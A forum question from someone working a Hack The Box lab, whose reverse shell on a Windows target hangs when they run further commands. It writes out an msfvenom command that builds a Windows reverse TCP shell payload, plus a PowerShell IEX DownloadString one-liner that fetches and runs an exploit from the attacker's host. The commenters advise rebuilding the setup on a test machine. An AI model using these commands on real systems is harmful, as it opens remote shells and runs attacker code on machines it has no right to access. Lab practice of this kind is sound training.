# Spawned reverse shell will not run additional commands

Tags: tcp, reverse-shell

I am new to this, so I applogise if this is a silly question!

I have created a reverse shell on a Windows box using an exploit script and the following MSFVENOM to create a reverse shell.

```
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.49 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
```

The shell gets created ok, but I only have standard user privalages.

My issue happens when i try to run additional code to try to elvate my access. everything I run in the shell just hangs and provides no feed back. For example if i try to run.

```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.49/41020.exe')"
```

It just repeats the command in the shell and then does nothing.

I am sure i must be missing something as had a similar issue yesterday.

Any help greatly appreciated.

Comment: What happens when you run this from a command prompt on your windows machine with a standard user? Start there and work back to a reverse shell. It might be enlightening

Comment: I am on HTB, so dont have access to the machine. Is it a good approach to build similar boxes you have access too, for testing purposes?

Comment: Yes, this is an excellent way to understand problems faster and construct payloads that work on the first try instead of hammering on something that you don't understand

Comment: Thank you, thats good to know! :)